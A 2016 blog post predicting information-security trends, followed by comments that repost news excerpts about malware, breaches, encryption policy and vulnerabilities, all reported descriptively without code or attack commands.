Here are my predictions for trends in information security and cyber security for year 2016.
Year 2015 was bad for information security was pretty, and I would say that the trend is worrying. So I expect the year 2016 will have many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 there was Airplanes hacked, cars hacked, vulnerabilities in a breathtaking range of sensitive equipment from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016 and some new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.
Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but they will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, and in the identification of target can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.
EU information security decisions made in late 2015 will have impact on what comes in 2016: New EU data protection legislation package approved and EU Court of Justice decision in which it noted the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under the Safe Harbor violation of law – you need some other agreement for this. The situation for this will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data-protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.
After huge amount of user information leaks in 2015 from all kinds of Internet services, there will the challenges for cloud companies to gain trust in their security. You might have just dared to trust “the right cloud services,” since in principle the traditional information security point of view, they seem to be the main things okay, rising this privacy issues raised.
New environments will bring new threats. New operating systems versions means that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important important in 2016 as 5G networks will be critical infrastructure, on top of which for example. transport, industry, health and the new operators set up their business around 2020.
The huge amount of information security information is becoming harder and harder to manage in 2016. A key problem in revelations as all other news coverage is the exponential growth of knowledge. There are variety of news summaries produced a daily basis, but they are not enough to get good picture of what is happening. There are bigger and smaller news, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.
Old way network security focused on perimeter defense is not enough in 2016. Old mantras “encrypt everything” and “secure the perimeter,” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: If you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”—any device or sensor connected to a network—to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will be hacked. To address those threats in 2016, security experts should assume compromise – that hackers and malware already have breached their defenses, or soon will – and instead classify and mitigate threats. In addition to public key infrastructure lock-and-key system you will need also an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans to various kinds of breaches – with a strong focus on integrity.
Law enforcement versus Silicon Valley tension will continue to be strong throughout year 2016. In 2015 Law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as the result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes.Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that Governments Lie About Encryption Backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.
But this does not stop some government officials to demand such thing with varying success on different countries. Another fact is that The existence of coded communications is a reality and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: Encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access to government – ie, a backdoor – would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals - Juniper’s VPN security hole is proof that govt backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you – the bad guys having strong protections for their data, and the rest of us not. The poorly thought-out and crude surveillance technique could have a devastating effect on the country’s internet security- as for example Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users install state-issued root certificate by January 1, 2016.
Google, Mozilla and Microsoft are pushing for early SHA-1 crypto cutoff that can happen in 2016 instead of earlier planned Jan 1st, 2017. Due to recent research showing that SHA-1 is weaker than previously believed, because it’s been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start display errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates in the end of 2016.
The use of Blockchain technology, permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will get used more widely than for just Bitcoin virtual money. With bitcoin, Blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX—the company behind the Nasdaq stock exchange—is using the blockchain to oversee the exchange of private stock. Also several major companies from across both the technology and financial industries—including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street—have joined forces to create an alternative to the blockchain with Linux Foundation.
The use of disk encryption will increase and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or loose your key? There are certainly cases where it’s helpful to have a backup of your key or password – so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users that don’t have high security neeeds. The disadvantage of this approach is that Your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.
Weak leaking passwords are still huge security problem still in 2016. Passwords are often the weakest parts when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication – like using a USB stick with a secret token or entering in a code sent via text method to your phone – can help to increase security, but many users also find this to be a hassle as it introduces an additional step to the login process.
Google begins testing login system that uses phone notifications for authentication instead of passwords: authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in involving a push notification sent to your phone that then opens an app where you approve the log-in.
Smart phone will become more and more security critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication. “We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”
Expect that number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?
Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years. I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP as “There are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business and mission-critical systems, both in private sector and government enterprises. For example US Navy is using obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s the wrong approach to information security completely.
Cars were hacked at record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars are featuring more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a five star Cyber Safety Framework to mitigate this threat in cars, hopefully car component makers study it.
IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms – not yet the weapon of choice for commercial malware authors – but business beware. Wearables won’t be safe, either, as they are built using largerly same too often vulnerable technologies as other IoT system. IoT security is still in in infancy in 2016.
Cyber criminals have become more active in 2015 particularly in the malicious the ransom fabrications. The ransom-malware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily and Exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransom-malware I recommend to ensure IT Support or your service provider the data back-up and restoring procedure operational, practiced and tested. You can need it in 2016 to get your data back without considering paying to criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.
Ransomware will continue to dominate in 2016 and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held ransom to DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space—including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. Ransomware Is Coming to Medical Devices article tells that according to a report released recently week by Forrester Research the number one cybersecurity prediction for 2016: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint”. Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.
Keep in mind that everything connected to the Internet can, and will be hacked. In 2016 If You’re Not Paranoid, You’re Crazy. As government agencies and tech companies develop more and more intrusive means of watching and influencing people, how can we live free lives? Unfortunately I don’t have solution for that.
2,232 Comments
Tomi Engdahl says:
Romanian ATM hacker exploits vulnerability in FENCE, escapes jail
Robber clobbered but catching carder is harder
http://www.theregister.co.uk/2016/03/08/romanian_atm_hacker_exploits_vulnerability_in_fence_escapes_jail/
A Romanian carder arrested for using malware to plunder US$217,000 (£152,164, A$290,888) from ATMs has cut their way out of a Bucharest prison and escaped custody.
Tulli and his gang raided ATMs maintained by NCR across Romania, Hungary, Spain, Russia, and the Czech Republic.
They used the Tyupkin malware loading it onto ATMs using a CD slotted into the back of the machines.
That malware has been upgraded in recent months and is now known as GreenDispenser and is being used to target ATMs across Mexico.
‘Self-deleting’ Mexican ATM malware let sneaky miscreants slurp cash
Software nasty can be planted, operate and wipe itself all without detection
http://www.theregister.co.uk/2015/09/25/mexican_atm_malware/
Tomi Engdahl says:
New Remaiten Malware Builds Botnet of Linux-Based Routers
http://www.securityweek.com/new-remaiten-malware-builds-botnet-linux-based-routers
Remaiten Linux Bot Targets Routers and Potentially Other Embedded (IoT) Devices
A new piece of malware is targeting embedded systems with the mission to compromise and make them part of a botnet, ESET security researchers have discovered.
Dubbed “Remaiten” (Linux/ Remaiten), the new threat combines the capabilities of previously spotted Tsunami (also known as Kaiten) and Gafgyt malware and also brings a series of improvements and new features. According to ESET, three versions of Remaiten have already emerged, while the malware authors call their creation “KTN-Remastered” or “KTN-RM.”
One of the capabilities that Remaiten borrows from Gafgyt is telnet scanning, though Remaiten enjoys a series of improvements, ESET’s Michal Malik explains in a blog post. Both, however, rely on improperly secured devices to successfully infect them.
Gafgyt attempts to connect to random routers via port 23, which it then issues a shell command to download bot executables for multiple architectures and tries to run them.
The bot binaries include a hardcoded list of C&C server IP addresses, and the malware chooses one at random and connects to it on a hardcoded port (the port is different from one variant to another). Upon successful connection to the C&C server, the bot checks-in on the IRC channel, and the server replies with a welcome message and further instructions.
There are various IRC commands that the bot supports
Meet Remaiten – a Linux bot on steroids targeting routers and potentially other IoT devices
http://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/
ESET researchers are actively monitoring malware that targets embedded systems such as routers, gateways and wireless access points. Recently, we discovered a bot that combines the capabilities of Tsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions of Linux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware “KTN-Remastered” or “KTN-RM”.
In this blog we will describe the unique spreading mechanism of Linux/Remaiten, its different features, and the differences between the versions found in the wild.
Tomi Engdahl says:
New Dripion Backdoor Powers Targeted Attacks in Taiwan
http://www.securityweek.com/new-dripion-backdoor-powers-targeted-attacks-taiwan
Custom Backdoor Used in Targeted Attacks with Command and Control Servers Disguised as Antivirus Company Sites
Tomi Engdahl says:
Cyber Situational Awareness and the Kill Chain
http://www.securityweek.com/cyber-situational-awareness-and-kill-chain
The concept of the cyber kill chain has done a lot to advance the general understanding of how attacks unfold and how to combat them. The steps – reconnaissance, weaponization, delivery, exploitation, installation, command and control, actions on objectives – each have implications for how, as security professionals, we can strengthen our defenses. Initially these defenses concentrated on the network, and specifically the perimeter. But today, as attacks have increased in sophistication and frequency, it takes more to be a kill chain “killjoy.”
Recent ESG research (“Threat Intelligence as part of Cyber Situational Awareness”) indicates that in response to growing threats, many organizations are investing in threat intelligence programs in order to track “in-the-wild” hacker activities and malware threats.
Take for example, the first step in the kill chain – reconnaissance. An adversary surveys the target and seeks out weaknesses, potential vectors, and other information to assist with an attack. Organizations traditionally address this step in a number of ways, including firewall or proxy logs, honeypots and network-based intrusion detection systems (NIDS). But, unfortunately, these only aim to detect threats that directly target the perimeter network and fail to address other important threats, such as data that already found a way outside the organization through many different means
In conjunction with the increased attack surface, there is also the threat landscape to consider and the range of actors who are potentially discussing plans regarding attacks against an organization. Hacktivists often do this publically, but criminals and nation states are much more covert.
Reconnaissance is followed by weaponization. Depending on the type of threat you are dealing with, this can be anything from an easily available and simple to use exploit, up to the crafting and deployment of a zero-day vulnerability. Honeypots, sandboxes and NIDS all help to this end but, again, they only attempt to deal with the threats as they hit directly the organization, sometimes too little too late.
Once the attack is launched and inside the network – the delivery, exploitation, installation, command and control, and actions on objectives stages – there are many effective security controls that help. But these can and should be supplemented with information from outside the organization to assess their effectiveness. For example, in the case of a Data Loss Prevention (DLP) solution, proxy or firewall, you need to be able to look outside of the organization to determine if the data these tools are trying to protect has been breached.
Tomi Engdahl says:
‘Hack The Pentagon’ Bug Bounty Program Opens For Registration
https://yro.slashdot.org/story/16/03/31/2013254/hack-the-pentagon-bug-bounty-program-opens-for-registration
Starting today, security researchers can register to test their hacking skills against the Department of Defense (DoD) through “Hack the Pentagon,” a new bug bounty program that will award security researchers who discover vulnerabilities on the Pentagon’s public web pages.
The initiative, run through a partnership with bug bounty platform provider HackerOne
’Hack the Pentagon’ Pilot Program Opens for Registration
DoD News, Defense Media Activity
http://www.defense.gov/News-Article-View/Article/710033/hack-the-pentagon-pilot-program-opens-for-registration
Tomi Engdahl says:
Don’t be an April Fool.
Be prepared. Back up your files on March 31st.
http://www.worldbackupday.com/en/
What is backup?
A backup is a second copy of all your important files — for example, your family photos, home videos, documents and emails.
Instead of storing it all in one place (like your computer), you keep another copy of everything somewhere safe.
But why should I backup?
Losing your files is way more common than you’d think.
Ever lost your phone, camera or tablet? That counts. Your stuff could have been saved with a backup.
One small accident or failure could destroy all the important stuff you care about.
So how do I backup?
Most people backup their files in one of two ways: to an external drive, or somewhere on the Internet.
It’s really easy, and you only need to set it up once!
Tomi Engdahl says:
The Strange Origins of TrueCrypt, ISIS’s Favored Encryption Tool
http://www.newyorker.com/news/news-desk/the-strange-origins-of-truecrypt-isiss-favored-encryption-tool
On Tuesday, the Times reporter Rukmini Callimachi published the latest in a series of blockbuster stories about the inner workings of the Islamic State. The piece focussed on the logistics of the group’s deployment of terrorists in Europe, but also included a significant revelation in an ongoing debate about encryption. In ISIS’s training and operational planning, Callimachi reported, the group appeared to routinely use a piece of software called TrueCrypt. When one would-be bomber was dispatched from Syria to France, Callimachi writes, “an Islamic State computer specialist handed him a USB key. It contained CCleaner, a program used to erase a user’s online history on a given computer, as well as TrueCrypt, an encryption program that was widely available at the time and that experts say has not yet been cracked.”
TrueCrypt and programs like it were the primary means for securing files and disks by those with a privacy bent of whatever stripe. Free to download and relatively user-friendly, TrueCrypt has been considered by experts to be among the strongest file-encryption programs available, since its release in 2004.
Without the user’s password, the software has long been viewed as uncrackable. Included in the information that Edward Snowden provided to Glenn Greenwald, Laura Poitras, and other reporters in 2013 was a document showing that the National Security Agency had “major problems” breaking TrueCrypt.
The genesis of TrueCrypt turns out to be as full of intrigue as the uses of it. The encryption software came up in my own reporting, in a story I’ve been researching for two years about a programmer named Paul Le Roux, who built a global drug, arms, and money-laundering cartel out of a base in the Philippines.
Both E4M and its progeny, TrueCrypt, are “open source” software. Their code is available to anyone to examine or to build upon, with some restrictions. The developers who expanded upon E4M to improve and maintain TrueCrypt over the years have remained anonymous. “The origin of TrueCrypt has always been very mysterious,”
In May, 2014, however, the anonymous developers behind TrueCrypt abruptly announced on their Web site that they would no longer support—or vouch for the security of—the software. Theories abound in the encryption community as to why
TrueCrypt shows is how impractical those back doors and requests are. TrueCrypt is an open-source program, maintained by mysterious, anonymous developers who are generally assumed to be outside the U.S. They likely have no legal incentive to help any government, and every practical incentive not to.
We now know that the original creator of E4M was not a company looking to curry favor with the U.S. government, but a man who went on to become one of its most wanted criminals. Negotiating back doors with such developers is almost certainly not an option. And TrueCrypt is just one of many open-source encryption programs available.
In 2015, Green and some colleagues completed a security audit of TrueCrypt, concluding that, the developers’ shutdown notwithstanding, the software remained secure from back doors or cracking. ISIS certainly seems to think so.
How ISIS Built the Machinery of Terror Under Europe’s Gaze
http://www.nytimes.com/2016/03/29/world/europe/isis-attacks-paris-brussels.html?_r=0
Tomi Engdahl says:
PHP, Python and Google Go Fail To Detect Revoked TLS Certificates
https://news.slashdot.org/story/16/04/01/0121226/php-python-and-google-go-fail-to-detect-revoked-tls-certificates
Four years after the release of a groundbreaking study on the state of SSL/TLS certificates in non-browser applications (APIs [to be exact]), some programming languages fail to provide developers with the appropriate tools to validate certificates. Using three simple test scripts connected to a list of known vulnerable HTTPS servers, researchers logged their results to see which programming languages detected any problems.
The Most Dangerous Code in the World:
Validating SSL Certificates in Non-Browser Software
https://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf
The main lesson of this paper is that using SSL in non-browser
software is a surprisingly challenging task. We demonstrat
ed that
even applications that rely on standard SSL libraries such a
s JSSE,
OpenSSL, GnuTLS, etc. often perform SSL certificate validat
ion
incorrectly or not at all. These vulnerabilities are pervas
ive in crit-
ical software, such as Amazon FPS and PayPal libraries for tr
ans-
mitting customers’ payment details from merchants to payme
nt
gateways; integrated shopping carts; Amazon EC2, Rackspac
e, and
other clients for remote administration of cloud storage an
d virtual
cloud infrastructure; Chase mobile banking on Android; and
many
other popular programs. Their SSL connections are complete
ly in-
secure against a man-in-the-middle attack.
Tomi Engdahl says:
“PHP, Python, and Google Go perform no revocation checks by default, neither does the cURL library. If the certificate was compromised and revoked by the owner, you will never know about it”
Beware of Unverified TLS Certificates in PHP & Python
By Peter Kankowski on March 31, 2016 .
https://blog.sucuri.net/2016/03/beware-unverified-tls-certificates-php-python.html
Web developers today rely on various third-party APIs. For example, these APIs allow you to accept credit card payments, integrate a social network with your website, or clear your CDN’s cache. The HTTPS protocol is used to secure the connection with the API server. However, if your web app doesn’t verify the TLS certificate, a malicious person can steal your passwords or your customers’ credit card numbers.
When implemented correctly, the TLS protocol provides both encryption and authentication. The connection between your server and the API server is encrypted using a symmetric cipher (typically AES) so an eavesdropper cannot read your data. The server also confirms its identity (authenticates itself) by sending an X.509 certificate to the client. The client must verify the certificate’s signature against the list of known root certificates, but this step is often neglected. As a result, a man-in-the-middle attack becomes possible.
If you don’t verify the certificate, the attacker can masquerade as the API server, intercept data sent in both directions, or even return false messages that the API server never sent to you. This attack was previously discussed in the paper The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software by Martin Georgiev and others. The authors found that several API client libraries written in Java and PHP don’t verify the certificates correctly, so they are vulnerable to the attack.
Tomi Engdahl says:
Patch Out For ‘Ridiculous’ Trend Micro Command Execution Vulnerability
https://tech.slashdot.org/story/16/03/31/1725249/patch-out-for-ridiculous-trend-micro-command-execution-vulnerability
A bug in its software meant that Trend Micro accidentally left a remote debugging server running on customer machines. The flaw, discovered by Google’s Project Zero researcher Tavis Ormandy, opened the door to command execution of vulnerable systems (running either Trend Micro Maximum Security, Trend Micro Premium Security or Trend Micro Password Manager).
Patch out for ‘ridiculous’ Trend Micro command execution vuln
Password Manager, Maximum Security and Premium Security are all at risk
http://www.theregister.co.uk/2016/03/31/trend_micro_patches_command_execution_flaw/
A bug in its software meant that Trend Micro accidentally left a remote debugging server running on customer machines
Trend Micro issued a patch for the flaw on Wednesday, a little over a week after Ormandy reported the bug to it on 22 March. The patch is not complete but does address the most critical issues at hand, according to Trend.
Ormandy, a top bug hunter on the Google Project Zero team, has carved out a particular speciality in rooting out security flaws of anti-virus products, uncovering bugs in technology from ESET, FireEye, Kaspersky and Avast.
Tomi Engdahl says:
Teens would sell their personal data instead of working
https://nakedsecurity.sophos.com/2016/03/30/teens-would-prefer-to-sell-their-personal-data-rather-than-work/
Teens are well aware of the value of their personal data.
In fact, it’s about as valuable as a large pizza.
For the not-so-princely sum of £15 (call it $20), 42% of survey respondents said they’d rather give away their personal data than work at a job to earn the cash, according to a new study.
This is what the kids said they’re “mostly happy” to exchange personal data for:
Sharing location data with university to help use facilities or campus better, improve personal safety (39%).
Health data being monitored and shared with medical staff to better diagnose (37%).
Biometric data passwords (42%).
On the other hand, this sort of data sharing made them “mostly unhappy”:
Organizations sharing data with third parties (60%).
Movement tracked in-store via personal device for marketing purposes (41%).
Online habits used to provide targeted ads and promotions (50%).
Location data used or shared (54%).
Unlocking the keys to a teen’s data-sharing heart is pure gold to marketers, of course.
The Truth Behind UK’s Future Workforce: £15 the Value of Privacy, Coders in Every Classroom
http://www.uk.logicalis.com/news/the-truth-behind-uks-future-workforce-15-the-value-of-privacy-coders-in-every-classroom/
A nationwide survey of 1000 13-17 year olds has revealed a growing number of digitally literate teens able to code, hack, and who are happy to swap their personal information in return for cash. The findings are published today in the eighth annual Realtime Generation report commissioned by Logicalis UK, entitled ‘The Age of Digital Enlightenment’.
A day-in-the-life of a UK teen is mobile (93% own a smartphone) and includes nine hours online, consuming, publishing or creating content. For this generation, there is an app for everything and, if one doesn’t exist, a growing number (18% currently) are acquiring the coding skills to build their own.
Tomi Engdahl says:
Mike Perry / The Tor Blog blogs:
Tor says CloudFlare’s claim that 94% of requests from Tor are malicious is likely based on flawed methodology, asks for explanation
The Trouble with CloudFlare
https://blog.torproject.org/blog/trouble-cloudflare
Wednesday, CloudFlare blogged that 94% of the requests it sees from Tor are “malicious.” We find that unlikely, and we’ve asked CloudFlare to provide justification to back up this claim. We suspect this figure is based on a flawed methodology by which CloudFlare labels all traffic from an IP address that has ever sent spam as “malicious.” Tor IP addresses are conduits for millions of people who are then blocked from reaching websites under CloudFlare’s system.
Tomi Engdahl says:
Reuters:
Sources: Egypt blocked Facebook’s Free Basics service after the company refused to let the government spy on users — Exclusive: Egypt blocked Facebook Internet service over surveillance – sources — Egypt blocked Facebook Inc’s (FB.O) Free Basics Internet service at the end of last year …
Exclusive: Egypt blocked Facebook Internet service over surveillance – sources
http://www.reuters.com/article/us-facebook-egypt-idUSKCN0WY3JZ
Egypt blocked Facebook Inc’s (FB.O) Free Basics Internet service at the end of last year after the U.S. company refused to give the Egyptian government the ability to spy on users, two people familiar with the matter said.
Mohamed Hanafi, a spokesman for Egypt’s Ministry of Communication, declined to comment specifically on the allegation about surveillance demands but cited other reasons for Free Basics to be blocked.
“The service was offered free of charge to the consumer, and the national telecommunication regulator saw the service as harmful to companies and their competitors,” he said.
Free Basics, which is available in 37 countries that have large populations without reliable Internet service, is central to Facebook’s global strategy.
Tomi Engdahl says:
Salvador Hernandez / BuzzFeed:
FBI Tells Local Law Enforcement It Will Help Unlock Phones — A law enforcement official told BuzzFeed News the FBI sent the advisory to local authorities on Friday in order to provide them with “technical assistance.” — Just days after breaking into a terrorist’s iPhone using …
FBI Tells Local Law Enforcement It Will Help Unlock Phones
http://www.buzzfeed.com/salvadorhernandez/fbi-tells-local-law-enforcement-it-will-help-unlock-phones#.qcaQ50dgMK
A law enforcement official told BuzzFeed News the FBI sent the advisory to local authorities on Friday in order to provide them with “technical assistance.”
Tomi Engdahl says:
Hacker reveals $40 attack that steals police drones from 2km away
No encryption in pro-grade drones: just sniff Wi-Fi and copy signals
http://www.theregister.co.uk/2016/04/01/hacker_reveals_40_attack_to_steal_28000_drones_from_2km_away/
Black Hat Asia IBM security guy Nils Rodday says thieves can hijack expensive professional drones used widely across the law enforcement, emergency, and private sectors thanks to absent encryption in on-board chips.
Rodday says the €25,000 (US$28,463, £19,816, AU$37,048) quadcopters can be hijacked with less than $40 of hardware, and some basic knowledge of radio communications.
With that in hand attackers can commandeer radio links to the drones from up to two kilometres away, and block operators from reconnecting to the craft.
The drone is often used by emergency services across Europe, but the exposure could be much worse; the targeted Xbee chip is common in drones everywhere and Rodday says it is likely many more aircraft are open to compromise.
The Germany-based UAV boffin worked with the consent and assistance of the unnamed vendor to pry apart the internals of the drone and the Android application which controls it.
Tomi Engdahl says:
Facebook To Slurp Oculus Rift Users’ Every Move
http://hackaday.com/2016/04/04/facebook-to-slurp-oculus-rift-users-every-move/
The web is abuzz with the news that the Facebook-owned Oculus Rift has buried in its terms of service a clause allowing the social media giant access to the “physical movements and dimensions” of its users. This is likely to be used for the purposes of directing advertising to those users and most importantly for the advertisers, measuring the degree of interaction between user and advert. It’s a dream come true for the advertising business, instead of relying on eye-tracking or other engagement studies on limited subsets of users they can take these metrics from their entire user base and hone their offering on an even more targeted basis for peak interaction to maximize their revenue.
Oculus Rift terms and conditions allow Facebook to monitor users’ movements and use it for advertising
http://www.independent.co.uk/life-style/gadgets-and-tech/news/oculus-rift-terms-and-conditions-allow-company-to-monitor-users-movements-and-use-it-for-advertising-a6967216.html
The Facebook-owned company’s VR headset installs a piece of software that keeps watch of when people are using it — and can send that off to other firms
Oculus Rift appears to collect information on the people wearing it and send all of that back to other companies, according to its terms and conditions.
Oculus, the virtual reality firm which was bought out by Facebook in 2014, is sending the first versions of its consumer headset out to users. But some are already pointing out terrifying parts of the terms of service that people sign up to use it.
When the headset’s software is installed on a computer, it adds a process that allows the PC to watch what the headset is doing and send that back to Oculus. That allows the headset to know when it is being used and turn itself on — but it also allows the company to collect information on people’s head movements and activity and send it back to advertisers.
“We use the information we collect to send you promotional messages and content and otherwise market to you on and off our Services,” the terms read. “We also use this information to measure how users respond to our marketing efforts.”
Tomi Engdahl says:
Taliban Launches Smartphone App to Recruit and Spread Propaganda
http://fortune.com/2016/04/03/taliban-launches-smartphone-app/
The Afghani group is playing catch-up with the more tech-savvy ISIS.
The terrorist monitoring organization SITE reported on Friday that the Afghani Taliban has developed and released an Android application, making it available on Google’s Play store.
Tomi Engdahl says:
Spies rejoice! Gmail, Facebook Messenger BREACHed once again
Thrice-upgraded attack framework now 500 times faster with badass modular Rupture framework
http://www.theregister.co.uk/2016/04/04/spies_rejoice_gmail_facebook_messenger_breached_once_again/
Research pair Dimitris Karakostas and Dionysis Zindros have upgraded their attack (codenamed BREACH) that pierces the web’s most common ciphers, and released a framework to help well-heeled hackers and state-sponsored spies spy on the likes of Facebook and Gmail.
At Black Hat Asia, the pair demonstrated once again how secure traffic from popular web services can be stolen, despite efforts to seal off the now three-year-old original attack vector.
The newest iteration is now more capable: attackers using the optimised BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) can target noisy end-points that use sluggish block ciphers, including AES 128 bit.
They say it’s also 500 times faster than the original attack; browser parallelisation is sped up by a factor of six, while requests are now 16 times faster.
Launching an attack is not child’s play. They told The Register it would take weeks to successfully compromise a target.
Tomi Engdahl says:
Did hacktivists really just expose half of Turkey’s entire population to ID theft?
Entire citizen database supposedly leaked via a torrent
http://www.theregister.co.uk/2016/04/04/turkey_megaleak/
A trove of leaked information, purported to be the entire Turkish citizenship database, has been leaked.
The leaked info appears to contain names, addresses and ID numbers of more than 49 million citizens. If confirmed the leak would become one of the biggest privacy breaches, by number of records, ever.
The leaked info weighs in at 6.6GB uncompressed and is searchable.
Those behind the leak imply that it was politically motivated, aimed against Turkey’s controversial president Recep Tayyip Erdoğan.
Turkey’s population is 79 million, according to a 2015 census
Tomi Engdahl says:
Panama Papers: Massive Data Leak Exposes Corrupt World Leaders and Tax Havens
http://www.securityweek.com/panama-papers-massive-data-leak-exposes-corrupt-world-leaders-and-tax-havens
2.6 Terabytes of Leaked Documents From Panama Law Firm Mossack Fonseca Expose World Leaders, Tax Havens and Shell Companies
We now know from the Panama Papers, a massive leak of documents from the Panamanian firm Mossack Fonseca, that Putin is just one of a large number of world leaders, businessmen and celebrities allegedly involved in tax avoidance through off-shore companies. The legal, political and financial ramifications from this leak will rumble on for years; but our concern here is not what was leaked, but by whom, how and to a lesser degree, why.
The basic facts are these. An anonymous source contacted Süddeutsche Zeitung (SZ) more than a year ago and provided encrypted internal documents from Mossack Fonseca. In the following months the supply grew to a massive 2.6 terabytes of data, containing 4.8 million emails, 2.2 million PDFs, and millions more database formats, images and text documents.
These documents needed to be anlayzed, and Süddeutsche Zeitung called on the International Consortium of Investigative Journalists (ICIJ) to help.
